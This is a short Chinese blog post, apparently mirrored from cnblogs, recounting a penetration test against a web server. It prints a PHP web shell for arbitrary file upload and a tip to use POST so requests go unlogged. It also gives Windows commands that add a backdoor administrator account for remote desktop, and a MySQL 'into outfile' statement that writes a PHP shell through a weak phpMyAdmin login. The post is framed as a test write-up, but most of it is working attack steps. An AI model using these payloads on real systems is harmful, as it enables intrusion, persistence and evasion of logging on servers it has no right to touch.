zoukankan      html  css  js  c++  java
  • 记录一次渗透测试全过程

    一、信息收集:

      1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。

      2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。

    二、任意文件上传:

      1、上传php文件: 

    <?php @system($_GET("cmd")) ?>
    /*
        合理合法过程要接受检查,不然还是传post,默认不记日志
        上传路径在下载页面可以爆出来,直接访问可以解析
    */

      2、可以菜刀直接连了,或者我这里增加了一个账户

    1 net user test test /add
    2 net localgroup administrators test /add 
    3 /*加入管理员,可以3389*/

      3、3389连上去:发现改机器被别人搞过:套路都一样。查日志post的,没操作。就能查到一个IP。根据网络安全监控设备日志查到归属人。

      4、另外一个弱口令登进去,mysql写一句话

    1 select "<?php system("cmd") ?>" into outfile "/mainpath/test.php";

      5、菜刀连接。开启了安全模式,php很多函数执行不了。郁闷!

  • 相关阅读:
    算法
    如果业界中不用高级算法和数据结构,那为什么还要学?
    CentOS 7 运行级别切换
    ECharts笔记
    Vue+TypeScript学习
    TypeScript深入学习
    TypeScript基础
    检测数据类型的方法
    前端提高性能的方式
    柯里化
  • 原文地址:https://www.cnblogs.com/KevinGeorge/p/8059736.html
Copyright © 2011-2022 走看看